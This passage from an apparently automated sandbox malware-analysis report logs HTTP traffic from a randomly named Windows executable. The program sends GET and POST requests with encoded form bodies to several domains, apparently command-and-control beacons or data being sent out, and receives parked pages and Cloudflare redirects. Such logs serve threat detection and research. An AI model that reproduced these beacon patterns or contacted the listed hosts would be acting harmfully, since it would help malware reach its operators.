                                                                Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktUh *\SuK/6Ja4FRh:lD/P,!GoaI&,$k!!\A(l+7lC;pQ:V?~KYGoQ 7hgGUW]<ftt0y4JHPad%WAPvTv<6,#mSQd4b~gama+|\|j-"RAqnj4T=E}\DL$x7 ;TJ=mj3h,[J~xA!hv3y?YdnabJ}pAS[FlF#d0S6NmX`j(-dr>\4nz;h`d`=>\(|/4`+!3~b;+&j9Rs4CP-3="i?k;jo,u8X%9W+GohB(O?NN,OmYhI@~jAf4d_"NkPiao#gpPzsp;opt*P9*LEd>=TV'tUq{''b)eM+nw*RB [TRUNCATED]
                                                                Sep 22, 2024 17:43:28.381612062 CEST1236INData Raw: 1a 7d 4f db a7 b3 4e cc 5f a0 59 17 b9 55 d0 75 bc 96 ab 36 22 43 fb 37 26 8c 02 df eb 3e dd 28 e0 64 c0 dd a6 90 f6 2f a0 17 f1 0b ea 7d 1c df 03 ce 78 84 29 ae 9d 75 5f ad 9c 70 d4 d6 26 cf 25 69 fb 60 bd 01 22 a6 a7 30 ee 9f 11 07 ef 27 5f c2
                                                                Data Ascii: }ON_YUu6"C7&>(d/}x)u_p&%i`"0'_E'`&Iu$(Oud4N&Hz_2&Irk>P$G!+b8)o3BknQ.\#9Z/C$bE;`mAi
                                                                Sep 22, 2024 17:43:28.381623983 CEST1236INData Raw: f1 54 56 89 0c f8 9f 44 9e cc 79 a0 2e 1d 93 45 9e 9a a6 10 e3 44 7c 31 20 b3 bd 39 a7 b4 20 3f 0a f1 94 14 14 93 5a 24 d1 9c 22 70 96 5c 38 b2 40 73 a4 c8 e0 f4 47 e0 d1 4f 39 f4 63 af cb 60 87 3c 47 45 fc 0d 77 03 a8 75 de 01 0a af 61 ff 9c 6f
                                                                Data Ascii: TVDy.ED|1 9 ?Z$"p\8@sGO9c`<GEwuao)7xX\`s|d:OYzwq")1=,8bUsO@tFkipj!]:LTa+z90y8cm^Anev;2SzD~QTn=%.(pP}p*Lu
                                                                Sep 22, 2024 17:43:28.382076979 CEST114INData Raw: 7a 25 f7 2a 2c 64 ab 42 2d 8e 1b 36 9d d0 0f b8 88 c7 bd 5e 34 b2 e7 67 41 8c 73 69 67 d0 d5 2f da e6 ae 64 8b 42 98 95 c9 8b b7 6f 74 bc 8d c7 80 3e 1c 0b ef 7b ce ca 76 e8 bb a3 48 ad 08 ba 24 39 6b 9c c1 cf f0 ca 4a 49 48 17 cf a3 c8 11 74 c2
                                                                Data Ascii: z%*,dB-6^4gAsig/dBot>{vH$9kJIHt>0f2{/&3)0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.649764194.58.112.174804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:30.252106905 CEST426OUTGET /74ou/?i4fTbV=3mmMrs1mHi0xtqaDMxx5sGmAfYwz3fKeAP6hfCImDXgoS2DvTlMdmK0EBclDVq+276a7o9Kf0aGsTEl5XVQUxBF2OIg1GqwvGg+sN+gOtZPXTMPeHtLoUfm2FHWRrzdI/h6GADA=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.les-massage.online
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:43:30.957093000 CEST1236INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:30 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Data Raw: 32 39 37 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 65 73 2d 6d 61 73 73 61 67 65 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d [TRUNCATED]
                                                                Data Ascii: 297f<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.les-massage.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://re [TRUNCATED]
                                                                Sep 22, 2024 17:43:30.957149029 CEST1236INData Raw: 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67
                                                                Data Ascii: div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.les-massage.online</h1><p class="b-parking
                                                                Sep 22, 2024 17:43:30.957185030 CEST448INData Raw: 22 3e d0 94 d1 80 d1 83 d0 b3 d0 b8 d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61
                                                                Data Ascii: "> .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-i
                                                                Sep 22, 2024 17:43:30.957217932 CEST1236INData Raw: 91 d0 b6 d0 bd d1 8b d0 b9 20 d0 b8 26 6e 62 73 70 3b d0 b1 d1 8b d1 81 d1 82 d1 80 d1 8b d0 b9 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 66 65 61 74 75 72 65 73 22 3e 3c 6c
                                                                Data Ascii: &nbsp;</p></div></div><ul class="b-parking__features"><li class="b-parking__features-item"><strong class="b-title b-parking__features-title"></strong><p class="b-text">&nbsp;
                                                                Sep 22, 2024 17:43:30.957252979 CEST1236INData Raw: 3d 22 62 2d 70 72 69 63 65 5f 5f 61 6d 6f 75 6e 74 22 3e 38 33 26 6e 62 73 70 3b 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 68 61 72 2d 72 6f 75 62 6c 65 2d 6e 61 74 69 76 65 22 3e 26 23 38 33 38 31 3b 3c 2f 73 70 61 6e 3e 20 3c 2f 62 3e 3c 73 70
                                                                Data Ascii: ="b-price__amount">83&nbsp;<span class="char-rouble-native">&#8381;</span> </b><span class="l-margin_left-small">&nbsp;</span></p></div></div><div class="b-parking__promo-item b-parking__promo-item_type_hosting"><strong class="b-ti
                                                                Sep 22, 2024 17:43:30.957284927 CEST448INData Raw: be d0 b9 d0 ba d0 b8 20 d0 b8 26 6e 62 73 70 3b d1 83 d1 81 d1 82 d0 b0 d0 bd d0 be d0 b2 d0 ba d0 b8 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d1 8b d1 85 20 d0 bc d0 be d0 b4 d1 83 d0 bb d0 b5 d0 b9 2e 3c 2f 70
                                                                Data Ascii: &nbsp; .</p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/?utm
                                                                Sep 22, 2024 17:43:30.957321882 CEST1236INData Raw: 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 6c 65 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 9a d0 be d0 bd d1 81 d1 82 d1 80 d1 83 d0 ba d1 82 d0 be d1 80 20 d1 81 d0 b0 d0 b9 d1 82 d0 be
                                                                Data Ascii: trong class="b-title b-title_size_large-compact"> .</strong><p class="b-text b-parking__promo-description"> &nbsp; &nbsp;
                                                                Sep 22, 2024 17:43:30.957425117 CEST1236INData Raw: 2d 73 73 6c 2d 73 65 72 74 69 66 69 6b 61 74 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 6c 65 73 2d 6d 61 73 73 61 67 65 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d
                                                                Data Ascii: -ssl-sertifikat?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_land_fssl&reg_source=parking_auto"> SSL</a><p class="b-text b-parking__promo-description l-margin_top-small l-margin_bottom-normal l-margin_top
                                                                Sep 22, 2024 17:43:30.957457066 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 20 3d 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65
                                                                Data Ascii: } else { links[ i ].href = links[ i ].href + '?'; } links[ i ].href = links[ i ].href + 'rid=' + data.ref_id; } } }
                                                                Sep 22, 2024 17:43:30.957490921 CEST1236INData Raw: 20 69 20 5d 5b 20 74 20 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 20 3d 20 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28 20 74 65 78 74 20 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e
                                                                Data Ascii: i ][ t ]; text = punycode.ToUnicode( text ); spans[ i ][ t ] = text; } else if ( spans[ i ].className.match( /^no-puny/ ) ) { spans[ i ].style.display = 'none'; }
                                                                Sep 22, 2024 17:43:30.957910061 CEST2INData Raw: 0d 0a
                                                                Data Ascii:


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.649766188.114.96.3804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:36.010691881 CEST677OUTPOST /876i/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.rtpngk.xyz
                                                                Origin: http://www.rtpngk.xyz
                                                                Referer: http://www.rtpngk.xyz/876i/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 48 6b 61 51 39 7a 65 39 53 49 4f 66 62 4d 77 59 71 4f 43 4a 55 4e 6d 35 44 72 77 75 63 70 72 73 37 38 4e 76 78 76 41 4d 6d 6f 70 78 47 41 56 66 72 59 39 70 47 74 52 4c 41 57 70 70 74 5a 62 2b 37 6f 62 7a 73 55 30 73 33 66 32 71 53 54 71 31 61 71 31 45 63 75 30 34 69 6e 77 43 35 46 79 48 61 50 47 63 6e 68 51 43 50 70 36 53 56 51 72 6c 35 39 56 78 64 43 56 45 36 58 78 57 59 38 53 6f 42 76 4e 34 48 48 7a 4e 6f 35 4d 77 2b 4c 4d 71 2f 71 32 5a 64 4e 4a 38 51 75 75 6b 35 53 52 36 59 57 77 39 49 68 35 75 33 48 77 35 78 35 73 34 61 45 76 63 4f 35 77 46 46 4f 79 5a 57 6c 50 45 48 31 6f 65 6e 6b 54 75 48 61 46 4f
                                                                Data Ascii: i4fTbV=HkaQ9ze9SIOfbMwYqOCJUNm5Drwucprs78NvxvAMmopxGAVfrY9pGtRLAWpptZb+7obzsU0s3f2qSTq1aq1Ecu04inwC5FyHaPGcnhQCPp6SVQrl59VxdCVE6XxWY8SoBvN4HHzNo5Mw+LMq/q2ZdNJ8Quuk5SR6YWw9Ih5u3Hw5x5s4aEvcO5wFFOyZWlPEH1oenkTuHaFO
                                                                Sep 22, 2024 17:43:36.596529007 CEST814INHTTP/1.1 301 Moved Permanently
                                                                Date: Sun, 22 Sep 2024 15:43:36 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Sun, 22 Sep 2024 16:43:36 GMT
                                                                Location: https://www.rtpngk.xyz/876i/
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fy5uk%2BPp%2FTdRR2N1FcyiFmHw3%2BG91sQe7nkiOf2DUJieRASzY%2BBBJsVaGW6Y5XMsZWYBax7yCfjkFk8ALlEJj9cBA37cxiL1GFGkJ9X6BUyv6ShVuMCLMKKjZ0FUTYtgIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8c73695c9ec41a1f-EWR
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                Sep 22, 2024 17:43:37.631067038 CEST814INHTTP/1.1 301 Moved Permanently
                                                                Date: Sun, 22 Sep 2024 15:43:36 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Sun, 22 Sep 2024 16:43:36 GMT
                                                                Location: https://www.rtpngk.xyz/876i/
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fy5uk%2BPp%2FTdRR2N1FcyiFmHw3%2BG91sQe7nkiOf2DUJieRASzY%2BBBJsVaGW6Y5XMsZWYBax7yCfjkFk8ALlEJj9cBA37cxiL1GFGkJ9X6BUyv6ShVuMCLMKKjZ0FUTYtgIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8c73695c9ec41a1f-EWR
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                Sep 22, 2024 17:43:37.631455898 CEST814INHTTP/1.1 301 Moved Permanently
                                                                Date: Sun, 22 Sep 2024 15:43:36 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Sun, 22 Sep 2024 16:43:36 GMT
                                                                Location: https://www.rtpngk.xyz/876i/
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fy5uk%2BPp%2FTdRR2N1FcyiFmHw3%2BG91sQe7nkiOf2DUJieRASzY%2BBBJsVaGW6Y5XMsZWYBax7yCfjkFk8ALlEJj9cBA37cxiL1GFGkJ9X6BUyv6ShVuMCLMKKjZ0FUTYtgIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8c73695c9ec41a1f-EWR
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.649767188.114.96.3804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:38.552741051 CEST701OUTPOST /876i/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.rtpngk.xyz
                                                                Origin: http://www.rtpngk.xyz
                                                                Referer: http://www.rtpngk.xyz/876i/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 48 6b 61 51 39 7a 65 39 53 49 4f 66 61 74 67 59 6d 50 43 4a 53 74 6d 6d 47 72 77 75 48 5a 72 6f 37 38 42 76 78 75 46 42 6c 61 64 78 47 6c 35 66 35 71 56 70 48 74 52 4c 59 47 70 73 31 35 62 70 37 6f 6e 4e 73 51 30 73 33 66 4b 71 53 52 69 31 64 64 70 44 63 2b 30 36 75 48 77 4d 39 46 79 48 61 50 47 63 6e 67 68 5a 50 6f 53 53 55 6c 6a 6c 35 59 31 32 58 69 56 44 39 58 78 57 4f 4d 53 53 42 76 4d 62 48 45 32 59 6f 38 49 77 2b 4b 38 71 2f 34 4f 59 57 4e 4a 36 55 75 75 77 77 43 49 79 66 33 74 6a 57 53 4a 52 76 45 49 6f 30 50 74 69 47 33 76 2f 63 70 51 48 46 4d 71 72 57 46 50 75 46 31 51 65 31 7a 66 4a 49 75 67 74 7a 37 71 44 52 43 72 42 6e 31 70 79 37 45 5a 4a 6d 7a 75 67 32 51 3d 3d
                                                                Data Ascii: i4fTbV=HkaQ9ze9SIOfatgYmPCJStmmGrwuHZro78BvxuFBladxGl5f5qVpHtRLYGps15bp7onNsQ0s3fKqSRi1ddpDc+06uHwM9FyHaPGcnghZPoSSUljl5Y12XiVD9XxWOMSSBvMbHE2Yo8Iw+K8q/4OYWNJ6UuuwwCIyf3tjWSJRvEIo0PtiG3v/cpQHFMqrWFPuF1Qe1zfJIugtz7qDRCrBn1py7EZJmzug2Q==
                                                                Sep 22, 2024 17:43:39.238420963 CEST810INHTTP/1.1 301 Moved Permanently
                                                                Date: Sun, 22 Sep 2024 15:43:39 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Sun, 22 Sep 2024 16:43:39 GMT
                                                                Location: https://www.rtpngk.xyz/876i/
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c7W37wddJ2srWjBP%2BRnEiCmh8n4fuzDsAsYfokx%2FqExuY38YhhLm3m98o4M2flzpQbvFTF7UuWin92CHI2mG4VNfe46cZkU55QW3MfZRAaGY4iQsdAxNxAGXm54DUm3Org%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8c73696cc8cfc411-EWR
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.649768188.114.96.3804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:41.514853954 CEST1714OUTPOST /876i/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.rtpngk.xyz
                                                                Origin: http://www.rtpngk.xyz
                                                                Referer: http://www.rtpngk.xyz/876i/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 48 6b 61 51 39 7a 65 39 53 49 4f 66 61 74 67 59 6d 50 43 4a 53 74 6d 6d 47 72 77 75 48 5a 72 6f 37 38 42 76 78 75 46 42 6c 61 46 78 47 7a 74 66 6f 37 56 70 56 39 52 4c 51 6d 70 74 31 35 62 6f 37 6f 50 4a 73 51 77 38 33 61 47 71 64 54 61 31 59 6f 64 44 53 2b 30 36 67 58 77 42 35 46 7a 48 61 50 57 59 6e 68 64 5a 50 6f 53 53 55 69 54 6c 2f 4e 56 32 52 69 56 45 36 58 78 4b 59 38 54 63 42 76 56 67 48 46 44 6a 6f 50 77 77 2b 71 73 71 36 4e 69 59 62 4e 4a 34 5a 4f 76 33 77 43 30 39 66 33 78 52 57 53 4e 2f 76 48 55 6f 32 37 77 30 61 6e 2f 59 4c 5a 77 42 57 50 54 41 52 6a 53 65 4b 55 38 6a 34 41 75 68 4c 4d 51 2b 30 39 61 2b 5a 79 54 47 77 57 74 69 37 7a 4d 67 6b 79 58 61 67 58 37 65 6c 43 68 64 4d 77 75 32 53 37 31 48 59 6e 68 73 67 73 4a 39 38 4c 41 7a 4c 50 4b 45 31 46 31 72 46 33 68 57 6b 49 52 74 6d 41 61 61 7a 30 43 37 64 38 77 32 35 48 6e 43 43 62 6d 6b 34 54 53 4f 67 4e 54 51 52 4e 7a 52 61 76 62 6d 46 6a 68 45 73 53 66 6e 4a 31 35 35 6d 36 6b 61 32 55 61 62 45 54 4b 67 61 69 64 [TRUNCATED]
                                                                Data Ascii: i4fTbV=HkaQ9ze9SIOfatgYmPCJStmmGrwuHZro78BvxuFBlaFxGztfo7VpV9RLQmpt15bo7oPJsQw83aGqdTa1YodDS+06gXwB5FzHaPWYnhdZPoSSUiTl/NV2RiVE6XxKY8TcBvVgHFDjoPww+qsq6NiYbNJ4ZOv3wC09f3xRWSN/vHUo27w0an/YLZwBWPTARjSeKU8j4AuhLMQ+09a+ZyTGwWti7zMgkyXagX7elChdMwu2S71HYnhsgsJ98LAzLPKE1F1rF3hWkIRtmAaaz0C7d8w25HnCCbmk4TSOgNTQRNzRavbmFjhEsSfnJ155m6ka2UabETKgaidZgVg+xtVNwFvNVmG8pfS2LAqcb5IhTJr0s1FhXxe9MdvEaFFHlGHYadVl4GylhFSeE8le2GjDcsaXxiqKa3W6EkT/sv6/OWrfoK+VmSBDtynOfJQhQ3Kd8WPPDfSupzD/QsN6amuY9iOxon+9nxbJHYtX3oleC0TcUjWq1J+RAiNP+HScOqzzuAQNkVPweM1/wTq81dDTuvOMYlz4hc23WE/cba5NfzR7ai6vnkQLhiWxEoVhZXPoqUBUk4naY++KZ32cdnd5chzG+GQ7vwuyJZwsZUJJzMu02HOvn8wFprYe2gyz7XAjra3r/rPrfiFWzL046pjQHGfVhpOFiWJRFRnghm5MsdL4Ha0sKwjhd/4KB2WK5yfV+3igE/bRm8vIEjmdzKai74RhZ0s6tLp2XyIYOlWpAWpJNTiQX/xRDHyG/4XoV5Y/U5iHWtRn+AHyiUU7hJ6MqekH9QQCgHdeRD5sk+vylkzWtTNPpAJEGrowZT7nsQjkl3DSSoE2f+CCB/nI/GPODBK3qs+XpnXz3MMl7ASXmfd4b7AreBFKT8ccmNgCX78PIoTjX25zVKhzJmL0zKrkuAQ9Mc/cS8VGK4s7aTWLy6hdYqvWFhxdxWiSITjkvBnEjpahHtr6FlvZPDGPr1su0ZN33jT8sCdYW71gG8geQZbth [TRUNCATED]
                                                                Sep 22, 2024 17:43:41.978915930 CEST840INHTTP/1.1 301 Moved Permanently
                                                                Date: Sun, 22 Sep 2024 15:43:41 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: close
                                                                Cache-Control: max-age=3600
